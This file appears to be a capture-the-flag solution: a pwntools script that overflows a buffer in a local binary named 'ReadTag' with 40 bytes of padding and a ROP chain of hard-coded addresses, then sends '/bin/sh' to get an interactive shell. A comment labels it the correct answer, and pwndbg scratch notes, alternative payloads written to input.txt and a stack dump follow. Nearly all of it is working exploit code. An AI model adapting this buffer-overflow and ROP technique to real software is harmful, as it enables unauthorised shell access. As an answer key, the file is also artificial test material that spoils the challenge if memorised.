from pwn import *
io=process("./ReadTag")
io.sendlineafter("Please input the tag name you want to read","1"*40+"\x0b\x09\x40\x00\x00\x00\x00\x00\x00\x10\x60\x00\x00\x00\x00\x00\x80\x05\x40\x00\x00\x00\x00\x00"+"\x0b\x09\x40\x00\x00\x00\x00\x00\x00\x10\x60\x00\x00\x00\x00\x00"+"\x66\x05\x40\x00"+"\x00\x00\x00\x00"+"\xb0\x05\x40\x00"+"\x00\x00\x00\x00")
io.sendline("/bin/sh\x00")
io.interactive()
###正确答案如上
\x0b\x09\x40\x00\x00\x00\x00\x00\xcb\x09\x40\x00\x00\x00\x00\x00\x70\x05\x40\x00\x00\x00\x00\x00
"/bin/sh"

\x0b\x09\x40\x00\x00\x00\x00\x00\xcb\x09\x40\x00\x00\x00\x00\x00

pwndbg> set *0x004009cb=0x6e69622f
pwndbg> set *0x004009cf=0x68732f


f=open("./input.txt","w+")
f.write("1"*40+"\x0b\x09\x40\x00\x00\x00\x00\x00\xcb\x09\x40\x00\x00\x00\x00\x00\x80\x05\x40\x00\x00\x00\x00\x00"+"\x0b\x09\x40\x00\x00\x00\x00\x00\xcb\x09\x40\x00\x00\x00\x00\x00"+"\x66\x05\x40\x00"+"\x00\x00\x00\x00"+"\xb0\x05\x40\x00"+"\x00\x00\x00\x00")
f.close()


f=open("./input.txt","w+")
f.write("/badn/sh\x00"*5+"\x66\x05\x40\x00"+"\x00\x00\x00\x00"+"\xb0\x05\x40\x00"+"\x00\x00\x00\x00")
f.close()


01:0008│      0x7fffffffdef8 —▸ 0x7fffffffe2a5 ◂— 0xddc000632d006873 /* 'sh' */
02:0010│      0x7fffffffdf00 —▸ 0x7fffffffe2a8 ◂— 0xffffffddc000632d /* '-c' */
03:0018│      0x7fffffffdf08 —▸ 0x7fffffffe2ab ◂— 0x58007fffffffddc0